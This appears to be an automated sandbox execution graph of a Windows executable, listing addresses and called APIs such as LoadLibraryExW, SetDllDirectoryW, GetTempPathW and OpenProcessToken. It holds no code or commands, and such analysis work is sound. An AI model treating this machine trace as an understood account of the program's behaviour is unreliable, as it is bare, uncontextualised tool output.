                                                                                                                                                                                                                                  execution_graph 19012 7ff72c66f98c 19013 7ff72c66fb7e 19012->19013 19018 7ff72c66f9ce _isindst 19012->19018 19014 7ff72c664f08 memcpy_s 11 API calls 19013->19014 19015 7ff72c66fb6e 19014->19015 19016 7ff72c65c550 _log10_special 8 API calls 19015->19016 19017 7ff72c66fb99 19016->19017 19018->19013 19019 7ff72c66fa4e _isindst 19018->19019 19033 7ff72c676194 19019->19033 19024 7ff72c66fbaa 19026 7ff72c66a900 _isindst 17 API calls 19024->19026 19028 7ff72c66fbbe 19026->19028 19031 7ff72c66faab 19031->19015 19058 7ff72c6761d8 19031->19058 19034 7ff72c6761a3 19033->19034 19035 7ff72c66fa6c 19033->19035 19065 7ff72c6702d8 EnterCriticalSection 19034->19065 19040 7ff72c675598 19035->19040 19041 7ff72c6755a1 19040->19041 19045 7ff72c66fa81 19040->19045 19042 7ff72c664f08 memcpy_s 11 API calls 19041->19042 19043 7ff72c6755a6 19042->19043 19044 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 19043->19044 19044->19045 19045->19024 19046 7ff72c6755c8 19045->19046 19047 7ff72c66fa92 19046->19047 19048 7ff72c6755d1 19046->19048 19047->19024 19052 7ff72c6755f8 19047->19052 19049 7ff72c664f08 memcpy_s 11 API calls 19048->19049 19050 7ff72c6755d6 19049->19050 19051 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 19050->19051 19051->19047 19053 7ff72c66faa3 19052->19053 19054 7ff72c675601 19052->19054 19053->19024 19053->19031 19055 7ff72c664f08 memcpy_s 11 API calls 19054->19055 19056 7ff72c675606 19055->19056 19057 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 19056->19057 19057->19053 19066 7ff72c6702d8 EnterCriticalSection 19058->19066 19314 7ff72c665410 19315 7ff72c66541b 19314->19315 19323 7ff72c66f2a4 19315->19323 19336 7ff72c6702d8 EnterCriticalSection 19323->19336 19337 7ff72c67adfe 19338 7ff72c67ae0d 19337->19338 19339 7ff72c67ae17 19337->19339 19341 7ff72c670338 LeaveCriticalSection 19338->19341 19073 7ff72c67ad69 19076 7ff72c665478 LeaveCriticalSection 19073->19076 19343 7ff72c67abe3 19344 7ff72c67abf3 19343->19344 19347 7ff72c665478 LeaveCriticalSection 19344->19347 18954 7ff72c669961 18955 7ff72c66a3d8 45 API calls 18954->18955 18956 7ff72c669966 18955->18956 18957 7ff72c66998d GetModuleHandleW 18956->18957 18958 7ff72c6699d7 18956->18958 18957->18958 18964 7ff72c66999a 18957->18964 18966 7ff72c669864 18958->18966 18964->18958 18980 7ff72c669a88 GetModuleHandleExW 18964->18980 18986 7ff72c6702d8 EnterCriticalSection 18966->18986 18981 7ff72c669abc GetProcAddress 18980->18981 18982 7ff72c669ae5 18980->18982 18985 7ff72c669ace 18981->18985 18983 7ff72c669aea FreeLibrary 18982->18983 18984 7ff72c669af1 18982->18984 18983->18984 18984->18958 18985->18982 19007 7ff72c65bae0 19008 7ff72c65bb0e 19007->19008 19009 7ff72c65baf5 19007->19009 19009->19008 19011 7ff72c66d5fc 12 API calls 19009->19011 19010 7ff72c65bb6e 19011->19010 19159 7ff72c65cb50 19160 7ff72c65cb60 19159->19160 19176 7ff72c669ba8 19160->19176 19162 7ff72c65cb6c 19182 7ff72c65ce48 19162->19182 19164 7ff72c65d12c 7 API calls 19165 7ff72c65cc05 19164->19165 19166 7ff72c65cb84 _RTC_Initialize 19174 7ff72c65cbd9 19166->19174 19187 7ff72c65cff8 19166->19187 19168 7ff72c65cb99 19190 7ff72c669014 19168->19190 19174->19164 19175 7ff72c65cbf5 19174->19175 19177 7ff72c669bb9 19176->19177 19178 7ff72c669bc1 19177->19178 19179 7ff72c664f08 memcpy_s 11 API calls 19177->19179 19178->19162 19180 7ff72c669bd0 19179->19180 19181 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 19180->19181 19181->19178 19183 7ff72c65ce59 19182->19183 19186 7ff72c65ce5e __scrt_acquire_startup_lock 19182->19186 19184 7ff72c65d12c 7 API calls 19183->19184 19183->19186 19185 7ff72c65ced2 19184->19185 19186->19166 19215 7ff72c65cfbc 19187->19215 19189 7ff72c65d001 19189->19168 19191 7ff72c669034 19190->19191 19198 7ff72c65cba5 19190->19198 19192 7ff72c66903c 19191->19192 19193 7ff72c669052 GetModuleFileNameW 19191->19193 19194 7ff72c664f08 memcpy_s 11 API calls 19192->19194 19195 7ff72c66907d 19193->19195 19196 7ff72c669041 19194->19196 19230 7ff72c668fb4 19195->19230 19197 7ff72c66a8e0 _invalid_parameter_noinfo 37 API calls 19196->19197 19197->19198 19198->19174 19214 7ff72c65d0cc InitializeSListHead 19198->19214 19201 7ff72c6690c5 19202 7ff72c664f08 memcpy_s 11 API calls 19201->19202 19203 7ff72c6690ca 19202->19203 19204 7ff72c66a948 __free_lconv_mon 11 API calls 19203->19204 19204->19198 19205 7ff72c6690dd 19206 7ff72c6690ff 19205->19206 19208 7ff72c66912b 19205->19208 19209 7ff72c669144 19205->19209 19207 7ff72c66a948 __free_lconv_mon 11 API calls 19206->19207 19207->19198 19210 7ff72c66a948 __free_lconv_mon 11 API calls 19208->19210 19212 7ff72c66a948 __free_lconv_mon 11 API calls 19209->19212 19211 7ff72c669134 19210->19211 19213 7ff72c66a948 __free_lconv_mon 11 API calls 19211->19213 19212->19206 19213->19198 19216 7ff72c65cfd6 19215->19216 19218 7ff72c65cfcf 19215->19218 19219 7ff72c66a1ec 19216->19219 19218->19189 19222 7ff72c669e28 19219->19222 19229 7ff72c6702d8 EnterCriticalSection 19222->19229 19231 7ff72c668fcc 19230->19231 19235 7ff72c669004 19230->19235 19232 7ff72c66eb98 memcpy_s 11 API calls 19231->19232 19231->19235 19233 7ff72c668ffa 19232->19233 19234 7ff72c66a948 __free_lconv_mon 11 API calls 19233->19234 19234->19235 19235->19201 19235->19205 19239 7ff72c669d50 19242 7ff72c669ccc 19239->19242 19249 7ff72c6702d8 EnterCriticalSection 19242->19249 19416 7ff72c66afd0 19417 7ff72c66afd5 19416->19417 19421 7ff72c66afea 19416->19421 19422 7ff72c66aff0 19417->19422 19423 7ff72c66b032 19422->19423 19426 7ff72c66b03a 19422->19426 19424 7ff72c66a948 __free_lconv_mon 11 API calls 19423->19424 19424->19426 19425 7ff72c66a948 __free_lconv_mon 11 API calls 19427 7ff72c66b047 19425->19427 19426->19425 19428 7ff72c66a948 __free_lconv_mon 11 API calls 19427->19428 19429 7ff72c66b054 19428->19429 19430 7ff72c66a948 __free_lconv_mon 11 API calls 19429->19430 19431 7ff72c66b061 19430->19431 19432 7ff72c66a948 __free_lconv_mon 11 API calls 19431->19432 19433 7ff72c66b06e 19432->19433 19434 7ff72c66a948 __free_lconv_mon 11 API calls 19433->19434 19435 7ff72c66b07b 19434->19435 19436 7ff72c66a948 __free_lconv_mon 11 API calls 19435->19436 19437 7ff72c66b088 19436->19437 19438 7ff72c66a948 __free_lconv_mon 11 API calls 19437->19438 19439 7ff72c66b095 19438->19439 19440 7ff72c66a948 __free_lconv_mon 11 API calls 19439->19440 19441 7ff72c66b0a5 19440->19441 19442 7ff72c66a948 __free_lconv_mon 11 API calls 19441->19442 19443 7ff72c66b0b5 19442->19443 19448 7ff72c66ae94 19443->19448 19462 7ff72c6702d8 EnterCriticalSection 19448->19462 16037 7ff72c65cc3c 16058 7ff72c65ce0c 16037->16058 16040 7ff72c65cd88 16212 7ff72c65d12c IsProcessorFeaturePresent 16040->16212 16041 7ff72c65cc58 __scrt_acquire_startup_lock 16043 7ff72c65cd92 16041->16043 16050 7ff72c65cc76 __scrt_release_startup_lock 16041->16050 16044 7ff72c65d12c 7 API calls 16043->16044 16046 7ff72c65cd9d _CreateFrameInfo 16044->16046 16045 7ff72c65cc9b 16047 7ff72c65cd21 16064 7ff72c65d274 16047->16064 16049 7ff72c65cd26 16067 7ff72c651000 16049->16067 16050->16045 16050->16047 16201 7ff72c669b2c 16050->16201 16055 7ff72c65cd49 16055->16046 16208 7ff72c65cf90 16055->16208 16059 7ff72c65ce14 16058->16059 16060 7ff72c65ce20 __scrt_dllmain_crt_thread_attach 16059->16060 16061 7ff72c65cc50 16060->16061 16062 7ff72c65ce2d 16060->16062 16061->16040 16061->16041 16062->16061 16219 7ff72c65d888 16062->16219 16246 7ff72c67a4d0 16064->16246 16066 7ff72c65d28b GetStartupInfoW 16066->16049 16068 7ff72c651009 16067->16068 16248 7ff72c665484 16068->16248 16070 7ff72c6537fb 16255 7ff72c6536b0 16070->16255 16076 7ff72c65391b 16424 7ff72c6545c0 16076->16424 16077 7ff72c65383c 16415 7ff72c651c80 16077->16415 16081 7ff72c65385b 16327 7ff72c658830 16081->16327 16083 7ff72c65396a 16447 7ff72c652710 16083->16447 16087 7ff72c65388e 16094 7ff72c6538bb __vcrt_freefls 16087->16094 16419 7ff72c6589a0 16087->16419 16088 7ff72c65395d 16089 7ff72c653984 16088->16089 16090 7ff72c653962 16088->16090 16092 7ff72c651c80 49 API calls 16089->16092 16443 7ff72c66004c 16090->16443 16095 7ff72c6539a3 16092->16095 16096 7ff72c658830 14 API calls 16094->16096 16103 7ff72c6538de __vcrt_freefls 16094->16103 16100 7ff72c651950 115 API calls 16095->16100 16096->16103 16098 7ff72c653a0b 16099 7ff72c6589a0 40 API calls 16098->16099 16101 7ff72c653a17 16099->16101 16102 7ff72c6539ce 16100->16102 16104 7ff72c6589a0 40 API calls 16101->16104 16102->16081 16105 7ff72c6539de 16102->16105 16109 7ff72c65390e __vcrt_freefls 16103->16109 16458 7ff72c658940 16103->16458 16107 7ff72c653a23 16104->16107 16106 7ff72c652710 54 API calls 16105->16106 16115 7ff72c653808 __vcrt_freefls 16106->16115 16108 7ff72c6589a0 40 API calls 16107->16108 16108->16109 16110 7ff72c658830 14 API calls 16109->16110 16111 7ff72c653a3b 16110->16111 16112 7ff72c653b2f 16111->16112 16113 7ff72c653a60 __vcrt_freefls 16111->16113 16114 7ff72c652710 54 API calls 16112->16114 16116 7ff72c658940 40 API calls 16113->16116 16124 7ff72c653aab 16113->16124 16114->16115 16465 7ff72c65c550 16115->16465 16116->16124 16117 7ff72c658830 14 API calls 16118 7ff72c653bf4 __vcrt_freefls 16117->16118 16119 7ff72c653c46 16118->16119 16120 7ff72c653d41 16118->16120 16121 7ff72c653cd4 16119->16121 16122 7ff72c653c50 16119->16122 16474 7ff72c6544e0 16120->16474 16126 7ff72c658830 14 API calls 16121->16126 16340 7ff72c6590e0 16122->16340 16124->16117 16129 7ff72c653ce0 16126->16129 16127 7ff72c653d4f 16130 7ff72c653d65 16127->16130 16131 7ff72c653d71 16127->16131 16132 7ff72c653c61 16129->16132 16136 7ff72c653ced 16129->16136 16477 7ff72c654630 16130->16477 16134 7ff72c651c80 49 API calls 16131->16134 16138 7ff72c652710 54 API calls 16132->16138 16145 7ff72c653cc8 __vcrt_freefls 16134->16145 16139 7ff72c651c80 49 API calls 16136->16139 16138->16115 16142 7ff72c653d0b 16139->16142 16140 7ff72c653dc4 16390 7ff72c659390 16140->16390 16142->16145 16146 7ff72c653d12 16142->16146 16143 7ff72c653da7 SetDllDirectoryW LoadLibraryExW 16143->16140 16144 7ff72c653dd7 SetDllDirectoryW 16149 7ff72c653e0a 16144->16149 16191 7ff72c653e5a 16144->16191 16145->16140 16145->16143 16148 7ff72c652710 54 API calls 16146->16148 16148->16115 16151 7ff72c658830 14 API calls 16149->16151 16150 7ff72c654008 16153 7ff72c654035 16150->16153 16154 7ff72c654012 PostMessageW GetMessageW 16150->16154 16158 7ff72c653e16 __vcrt_freefls 16151->16158 16152 7ff72c653f1b 16395 7ff72c6533c0 16152->16395 16554 7ff72c653360 16153->16554 16154->16153 16159 7ff72c653ef2 16158->16159 16163 7ff72c653e4e 16158->16163 16162 7ff72c658940 40 API calls 16159->16162 16162->16191 16163->16191 16480 7ff72c656dc0 16163->16480 16170 7ff72c656fc0 FreeLibrary 16173 7ff72c65405b 16170->16173 16178 7ff72c653e81 16181 7ff72c653ea2 16178->16181 16192 7ff72c653e85 16178->16192 16501 7ff72c656e00 16178->16501 16181->16192 16520 7ff72c6571b0 16181->16520 16191->16150 16191->16152 16192->16191 16536 7ff72c652a50 16192->16536 16202 7ff72c669b43 16201->16202 16203 7ff72c669b64 16201->16203 16202->16047 18792 7ff72c66a3d8 16203->18792 16206 7ff72c65d2b8 GetModuleHandleW 16207 7ff72c65d2c9 16206->16207 16207->16055 16209 7ff72c65cfa1 16208->16209 16210 7ff72c65cd60 16209->16210 16211 7ff72c65d888 7 API calls 16209->16211 16210->16045 16211->16210 16213 7ff72c65d152 _CreateFrameInfo memcpy_s 16212->16213 16214 7ff72c65d171 RtlCaptureContext RtlLookupFunctionEntry 16213->16214 16215 7ff72c65d19a RtlVirtualUnwind 16214->16215 16216 7ff72c65d1d6 memcpy_s 16214->16216 16215->16216 16217 7ff72c65d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16216->16217 16218 7ff72c65d256 _CreateFrameInfo 16217->16218 16218->16043 16220 7ff72c65d89a 16219->16220 16221 7ff72c65d890 16219->16221 16220->16061 16225 7ff72c65dc24 16221->16225 16226 7ff72c65dc33 16225->16226 16227 7ff72c65d895 16225->16227 16233 7ff72c65de60 16226->16233 16229 7ff72c65dc90 16227->16229 16230 7ff72c65dcbb 16229->16230 16231 7ff72c65dc9e DeleteCriticalSection 16230->16231 16232 7ff72c65dcbf 16230->16232 16231->16230 16232->16220 16237 7ff72c65dcc8 16233->16237 16238 7ff72c65ddb2 TlsFree 16237->16238 16244 7ff72c65dd0c __vcrt_FlsAlloc 16237->16244 16239 7ff72c65dd3a LoadLibraryExW 16241 7ff72c65dd5b GetLastError 16239->16241 16242 7ff72c65ddd9 16239->16242 16240 7ff72c65ddf9 GetProcAddress 16240->16238 16241->16244 16242->16240 16243 7ff72c65ddf0 FreeLibrary 16242->16243 16243->16240 16244->16238 16244->16239 16244->16240 16245 7ff72c65dd7d LoadLibraryExW 16244->16245 16245->16242 16245->16244 16247 7ff72c67a4c0 16246->16247 16247->16066 16247->16247 16251 7ff72c66f480 16248->16251 16249 7ff72c66f4d3 16567 7ff72c66a814 16249->16567 16251->16249 16252 7ff72c66f526 16251->16252 16577 7ff72c66f358 16252->16577 16254 7ff72c66f4fc 16254->16070 16684 7ff72c65c850 16255->16684 16258 7ff72c6536eb GetLastError 16691 7ff72c652c50 16258->16691 16259 7ff72c653710 16686 7ff72c659280 FindFirstFileExW 16259->16686 16263 7ff72c65377d 16717 7ff72c659440 16263->16717 16264 7ff72c653723 16706 7ff72c659300 CreateFileW 16264->16706 16266 7ff72c65c550 _log10_special 8 API calls 16269 7ff72c6537b5 16266->16269 16269->16115 16277 7ff72c651950 16269->16277 16270 7ff72c653734 16709 7ff72c652810 16270->16709 16271 7ff72c65378b 16274 7ff72c652810 49 API calls 16271->16274 16275 7ff72c653706 16271->16275 16273 7ff72c65374c __vcrt_FlsAlloc 16273->16263 16274->16275 16275->16266 16278 7ff72c6545c0 108 API calls 16277->16278 16279 7ff72c651985 16278->16279 16280 7ff72c651c43 16279->16280 16281 7ff72c657f90 83 API calls 16279->16281 16282 7ff72c65c550 _log10_special 8 API calls 16280->16282 16284 7ff72c6519cb 16281->16284 16283 7ff72c651c5e 16282->16283 16283->16076 16283->16077 16326 7ff72c651a03 16284->16326 17122 7ff72c6606d4 16284->17122 16286 7ff72c66004c 74 API calls 16286->16280 16287 7ff72c6519e5 16288 7ff72c651a08 16287->16288 16289 7ff72c6519e9 16287->16289 17126 7ff72c66039c 16288->17126 16291 7ff72c664f08 memcpy_s 11 API calls 16289->16291 16293 7ff72c6519ee 16291->16293 17129 7ff72c652910 16293->17129 16294 7ff72c651a45 16300 7ff72c651a7b 16294->16300 16301 7ff72c651a5c 16294->16301 16295 7ff72c651a26 16297 7ff72c664f08 memcpy_s 11 API calls 16295->16297 16298 7ff72c651a2b 16297->16298 16299 7ff72c652910 54 API calls 16298->16299 16299->16326 16302 7ff72c651c80 49 API calls 16300->16302 16303 7ff72c664f08 memcpy_s 11 API calls 16301->16303 16304 7ff72c651a92 16302->16304 16305 7ff72c651a61 16303->16305 16306 7ff72c651c80 49 API calls 16304->16306 16307 7ff72c652910 54 API calls 16305->16307 16308 7ff72c651add 16306->16308 16307->16326 16309 7ff72c6606d4 73 API calls 16308->16309 16310 7ff72c651b01 16309->16310 16311 7ff72c651b35 16310->16311 16312 7ff72c651b16 16310->16312 16313 7ff72c66039c _fread_nolock 53 API calls 16311->16313 16314 7ff72c664f08 memcpy_s 11 API calls 16312->16314 16315 7ff72c651b4a 16313->16315 16316 7ff72c651b1b 16314->16316 16317 7ff72c651b6f 16315->16317 16318 7ff72c651b50 16315->16318 16319 7ff72c652910 54 API calls 16316->16319 17144 7ff72c660110 16317->17144 16320 7ff72c664f08 memcpy_s 11 API calls 16318->16320 16319->16326 16322 7ff72c651b55 16320->16322 16324 7ff72c652910 54 API calls 16322->16324 16324->16326 16325 7ff72c652710 54 API calls 16325->16326 16326->16286 16328 7ff72c65883a 16327->16328 16329 7ff72c659390 2 API calls 16328->16329 16330 7ff72c658859 GetEnvironmentVariableW 16329->16330 16331 7ff72c658876 ExpandEnvironmentStringsW 16330->16331 16332 7ff72c6588c2 16330->16332 16331->16332 16333 7ff72c658898 16331->16333 16334 7ff72c65c550 _log10_special 8 API calls 16332->16334 16335 7ff72c659440 2 API calls 16333->16335 16336 7ff72c6588d4 16334->16336 16337 7ff72c6588aa 16335->16337 16336->16087 16338 7ff72c65c550 _log10_special 8 API calls 16337->16338 16339 7ff72c6588ba 16338->16339 16339->16087 16341 7ff72c6590f5 16340->16341 17362 7ff72c658570 GetCurrentProcess OpenProcessToken 16341->17362 16344 7ff72c658570 7 API calls 16345 7ff72c659121 16344->16345 16346 7ff72c65913a 16345->16346 16347 7ff72c659154 16345->16347 16348 7ff72c6526b0 48 API calls 16346->16348 16349 7ff72c6526b0 48 API calls 16347->16349 16350 7ff72c659152 16348->16350 16351 7ff72c659167 LocalFree LocalFree 16349->16351 16350->16351 16352 7ff72c659183 16351->16352 16354 7ff72c65918f 16351->16354 17372 7ff72c652b50 16352->17372 16355 7ff72c65c550 _log10_special 8 API calls 16354->16355 16356 7ff72c653c55 16355->16356 16356->16132 16357 7ff72c658660 16356->16357 16358 7ff72c658678 16357->16358 16359 7ff72c65869c 16358->16359 16360 7ff72c6586fa GetTempPathW GetCurrentProcessId 16358->16360 16362 7ff72c658830 14 API calls 16359->16362 17381 7ff72c6525c0 16360->17381 16363 7ff72c6586a8 16362->16363 17388 7ff72c6581d0 16363->17388 16368 7ff72c6586e8 __vcrt_freefls 16389 7ff72c6587d4 __vcrt_freefls 16368->16389 16370 7ff72c658728 __vcrt_freefls 16375 7ff72c658765 __vcrt_freefls 16370->16375 17385 7ff72c668b68 16370->17385 16373 7ff72c65c550 _log10_special 8 API calls 16377 7ff72c653cbb 16373->16377 16374 7ff72c6586ce __vcrt_freefls 16374->16360 16378 7ff72c6586dc 16374->16378 16381 7ff72c659390 2 API calls 16375->16381 16375->16389 16377->16132 16377->16145 16380 7ff72c652810 49 API calls 16378->16380 16380->16368 16382 7ff72c6587b1 16381->16382 16383 7ff72c6587e9 16382->16383 16384 7ff72c6587b6 16382->16384 16386 7ff72c668238 38 API calls 16383->16386 16385 7ff72c659390 2 API calls 16384->16385 16387 7ff72c6587c6 16385->16387 16386->16389 16388 7ff72c668238 38 API calls 16387->16388 16388->16389 16389->16373 16391 7ff72c6593d6 16390->16391 16392 7ff72c6593b2 MultiByteToWideChar 16390->16392 16393 7ff72c6593f3 MultiByteToWideChar 16391->16393 16394 7ff72c6593ec __vcrt_freefls 16391->16394 16392->16391 16392->16394 16393->16394 16394->16144 16407 7ff72c6533ce memcpy_s 16395->16407 16396 7ff72c6535c7 16397 7ff72c65c550 _log10_special 8 API calls 16396->16397 16398 7ff72c653664 16397->16398 16398->16115 16414 7ff72c6590c0 LocalFree 16398->16414 16400 7ff72c651c80 49 API calls 16400->16407 16401 7ff72c6535e2 16403 7ff72c652710 54 API calls 16401->16403 16403->16396 16406 7ff72c6535c9 16409 7ff72c652710 54 API calls 16406->16409 16407->16396 16407->16400 16407->16401 16407->16406 16408 7ff72c652a50 54 API calls 16407->16408 16412 7ff72c6535d0 16407->16412 17677 7ff72c654560 16407->17677 17683 7ff72c657e20 16407->17683 17695 7ff72c651600 16407->17695 17743 7ff72c657120 16407->17743 17747 7ff72c654190 16407->17747 17791 7ff72c654450 16407->17791 16408->16407 16409->16396 16413 7ff72c652710 54 API calls 16412->16413 16413->16396 16416 7ff72c651ca5 16415->16416 16417 7ff72c664984 49 API calls 16416->16417 16418 7ff72c651cc8 16417->16418 16418->16081 16420 7ff72c659390 2 API calls 16419->16420 16421 7ff72c6589b4 16420->16421 16422 7ff72c668238 38 API calls 16421->16422 16423 7ff72c6589c6 __vcrt_freefls 16422->16423 16423->16094 16425 7ff72c6545cc 16424->16425 16426 7ff72c659390 2 API calls 16425->16426 16427 7ff72c6545f4 16426->16427 16428 7ff72c659390 2 API calls 16427->16428 16429 7ff72c654607 16428->16429 17974 7ff72c665f94 16429->17974 16432 7ff72c65c550 _log10_special 8 API calls 16433 7ff72c65392b 16432->16433 16433->16083 16434 7ff72c657f90 16433->16434 16435 7ff72c657fb4 16434->16435 16436 7ff72c6606d4 73 API calls 16435->16436 16441 7ff72c65808b __vcrt_freefls 16435->16441 16437 7ff72c657fd0 16436->16437 16437->16441 18366 7ff72c6678c8 16437->18366 16439 7ff72c6606d4 73 API calls 16442 7ff72c657fe5 16439->16442 16440 7ff72c66039c _fread_nolock 53 API calls 16440->16442 16441->16088 16442->16439 16442->16440 16442->16441 16444 7ff72c66007c 16443->16444 18381 7ff72c65fe28 16444->18381 16446 7ff72c660095 16446->16083 16448 7ff72c65c850 16447->16448 16449 7ff72c652734 GetCurrentProcessId 16448->16449 16450 7ff72c651c80 49 API calls 16449->16450 16451 7ff72c652787 16450->16451 16452 7ff72c664984 49 API calls 16451->16452 16453 7ff72c6527cf 16452->16453 16454 7ff72c652620 12 API calls 16453->16454 16455 7ff72c6527f1 16454->16455 16456 7ff72c65c550 _log10_special 8 API calls 16455->16456 16457 7ff72c652801 16456->16457 16457->16115 16459 7ff72c659390 2 API calls 16458->16459 16460 7ff72c65895c 16459->16460 16461 7ff72c659390 2 API calls 16460->16461 16462 7ff72c65896c 16461->16462 16463 7ff72c668238 38 API calls 16462->16463 16464 7ff72c65897a __vcrt_freefls 16463->16464 16464->16098 16466 7ff72c65c559 16465->16466 16467 7ff72c653ca7 16466->16467 16468 7ff72c65c8e0 IsProcessorFeaturePresent 16466->16468 16467->16206 16469 7ff72c65c8f8 16468->16469 18392 7ff72c65cad8 RtlCaptureContext 16469->18392 16475 7ff72c651c80 49 API calls 16474->16475 16476 7ff72c6544fd 16475->16476 16476->16127 16478 7ff72c651c80 49 API calls 16477->16478 16479 7ff72c654660 16478->16479 16479->16145 16481 7ff72c656dd5 16480->16481 16482 7ff72c653e6c 16481->16482 16483 7ff72c664f08 memcpy_s 11 API calls 16481->16483 16486 7ff72c657340 16482->16486 16484 7ff72c656de2 16483->16484 16485 7ff72c652910 54 API calls 16484->16485 16485->16482 18397 7ff72c651470 16486->18397 16488 7ff72c657368 16489 7ff72c654630 49 API calls 16488->16489 16499 7ff72c6574b9 __vcrt_freefls 16488->16499 16490 7ff72c65738a 16489->16490 16491 7ff72c65738f 16490->16491 16492 7ff72c654630 49 API calls 16490->16492 16494 7ff72c652a50 54 API calls 16491->16494 16493 7ff72c6573ae 16492->16493 16493->16491 16495 7ff72c654630 49 API calls 16493->16495 16494->16499 16496 7ff72c6573ca 16495->16496 16496->16491 16497 7ff72c6573d3 16496->16497 16498 7ff72c652710 54 API calls 16497->16498 16500 7ff72c657443 memcpy_s __vcrt_freefls 16497->16500 16498->16499 16499->16178 16500->16178 16517 7ff72c656e1c 16501->16517 16502 7ff72c656f3f 16503 7ff72c65c550 _log10_special 8 API calls 16502->16503 16505 7ff72c656f51 16503->16505 16504 7ff72c651840 45 API calls 16504->16517 16505->16181 16506 7ff72c656faa 16508 7ff72c652710 54 API calls 16506->16508 16507 7ff72c651c80 49 API calls 16507->16517 16508->16502 16509 7ff72c656f97 16510 7ff72c652710 54 API calls 16509->16510 16510->16502 16511 7ff72c654560 10 API calls 16511->16517 16512 7ff72c657e20 52 API calls 16512->16517 16513 7ff72c652a50 54 API calls 16513->16517 16514 7ff72c656f84 16516 7ff72c652710 54 API calls 16514->16516 16515 7ff72c651600 118 API calls 16515->16517 16516->16502 16517->16502 16517->16504 16517->16506 16517->16507 16517->16509 16517->16511 16517->16512 16517->16513 16517->16514 16517->16515 16518 7ff72c656f6d 16517->16518 16519 7ff72c652710 54 API calls 16518->16519 16519->16502 18427 7ff72c658e80 16520->18427 16522 7ff72c6571c9 16523 7ff72c658e80 3 API calls 16522->16523 16524 7ff72c6571dc 16523->16524 16525 7ff72c65720f 16524->16525 16526 7ff72c6571f4 16524->16526 16537 7ff72c65c850 16536->16537 16538 7ff72c652a74 GetCurrentProcessId 16537->16538 16539 7ff72c651c80 49 API calls 16538->16539 16540 7ff72c652ac7 16539->16540 16541 7ff72c664984 49 API calls 16540->16541 16542 7ff72c652b0f 16541->16542 16543 7ff72c652620 12 API calls 16542->16543 16544 7ff72c652b31 16543->16544 16545 7ff72c65c550 _log10_special 8 API calls 16544->16545 18503 7ff72c656360 16554->18503 16558 7ff72c653381 16562 7ff72c653399 16558->16562 18571 7ff72c656050 16558->18571 16560 7ff72c65338d 16560->16562 16563 7ff72c653670 16562->16563 16564 7ff72c65367e 16563->16564 16565 7ff72c65368f 16564->16565 18791 7ff72c658e60 FreeLibrary 16564->18791 16565->16170 16584 7ff72c66a55c 16567->16584 16571 7ff72c66a84f 16571->16254 16683 7ff72c66546c EnterCriticalSection 16577->16683 16585 7ff72c66a578 GetLastError 16584->16585 16586 7ff72c66a5b3 16584->16586 16587 7ff72c66a588 16585->16587 16586->16571 16590 7ff72c66a5c8 16586->16590 16597 7ff72c66b390 16587->16597 16591 7ff72c66a5fc 16590->16591 16592 7ff72c66a5e4 GetLastError SetLastError 16590->16592 16591->16571 16593 7ff72c66a900 IsProcessorFeaturePresent 16591->16593 16592->16591 16594 7ff72c66a913 16593->16594 16675 7ff72c66a614 16594->16675 16598 7ff72c66b3ca FlsSetValue 16597->16598 16599 7ff72c66b3af FlsGetValue 16597->16599 16600 7ff72c66a5a3 SetLastError 16598->16600 16602 7ff72c66b3d7 16598->16602 16599->16600 16601 7ff72c66b3c4 16599->16601 16600->16586 16601->16598 16614 7ff72c66eb98 16602->16614 16605 7ff72c66b404 FlsSetValue 16608 7ff72c66b422 16605->16608 16609 7ff72c66b410 FlsSetValue 16605->16609 16606 7ff72c66b3f4 FlsSetValue 16607 7ff72c66b3fd 16606->16607 16621 7ff72c66a948 16607->16621 16627 7ff72c66aef4 16608->16627 16609->16607 16617 7ff72c66eba9 memcpy_s 16614->16617 16615 7ff72c66ebfa 16635 7ff72c664f08 16615->16635 16616 7ff72c66ebde HeapAlloc 16616->16617 16618 7ff72c66b3e6 16616->16618 16617->16615 16617->16616 16632 7ff72c673590 16617->16632 16618->16605 16618->16606 16622 7ff72c66a94d RtlFreeHeap 16621->16622 16626 7ff72c66a97c 16621->16626 16623 7ff72c66a968 GetLastError 16622->16623 16622->16626 16624 7ff72c66a975 __free_lconv_mon 16623->16624 16625 7ff72c664f08 memcpy_s 9 API calls 16624->16625 16625->16626 16626->16600 16661 7ff72c66adcc 16627->16661 16638 7ff72c6735d0 16632->16638 16644 7ff72c66b2c8 GetLastError 16635->16644 16637 7ff72c664f11 16637->16618 16643 7ff72c6702d8 EnterCriticalSection 16638->16643 16645 7ff72c66b309 FlsSetValue 16644->16645 16651 7ff72c66b2ec 16644->16651 16646 7ff72c66b31b 16645->16646 16650 7ff72c66b2f9 16645->16650 16647 7ff72c66eb98 memcpy_s 5 API calls 16646->16647 16649 7ff72c66b32a 16647->16649 16648 7ff72c66b375 SetLastError 16648->16637 16652 7ff72c66b348 FlsSetValue 16649->16652 16653 7ff72c66b338 FlsSetValue 16649->16653 16650->16648 16651->16645 16651->16650 16655 7ff72c66b366 16652->16655 16656 7ff72c66b354 FlsSetValue 16652->16656 16654 7ff72c66b341 16653->16654 16657 7ff72c66a948 __free_lconv_mon 5 API calls 16654->16657 16658 7ff72c66aef4 memcpy_s 5 API calls 16655->16658 16656->16654 16657->16650 16659 7ff72c66b36e 16658->16659 16660 7ff72c66a948 __free_lconv_mon 5 API calls 16659->16660 16660->16648 16673 7ff72c6702d8 EnterCriticalSection 16661->16673 16676 7ff72c66a64e _CreateFrameInfo memcpy_s 16675->16676 16677 7ff72c66a676 RtlCaptureContext RtlLookupFunctionEntry 16676->16677 16678 7ff72c66a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16677->16678 16679 7ff72c66a6b0 RtlVirtualUnwind 16677->16679 16680 7ff72c66a738 _CreateFrameInfo 16678->16680 16679->16678 16681 7ff72c65c550 _log10_special 8 API calls 16680->16681 16682 7ff72c66a757 GetCurrentProcess TerminateProcess 16681->16682 16685 7ff72c6536bc GetModuleFileNameW 16684->16685 16685->16258 16685->16259 16687 7ff72c6592bf FindClose 16686->16687 16688 7ff72c6592d2 16686->16688 16687->16688 16689 7ff72c65c550 _log10_special 8 API calls 16688->16689 16690 7ff72c65371a 16689->16690 16690->16263 16690->16264 16692 7ff72c65c850 16691->16692 16693 7ff72c652c70 GetCurrentProcessId 16692->16693 16722 7ff72c6526b0 16693->16722 16695 7ff72c652cb9 16726 7ff72c664bd8 16695->16726 16698 7ff72c6526b0 48 API calls 16699 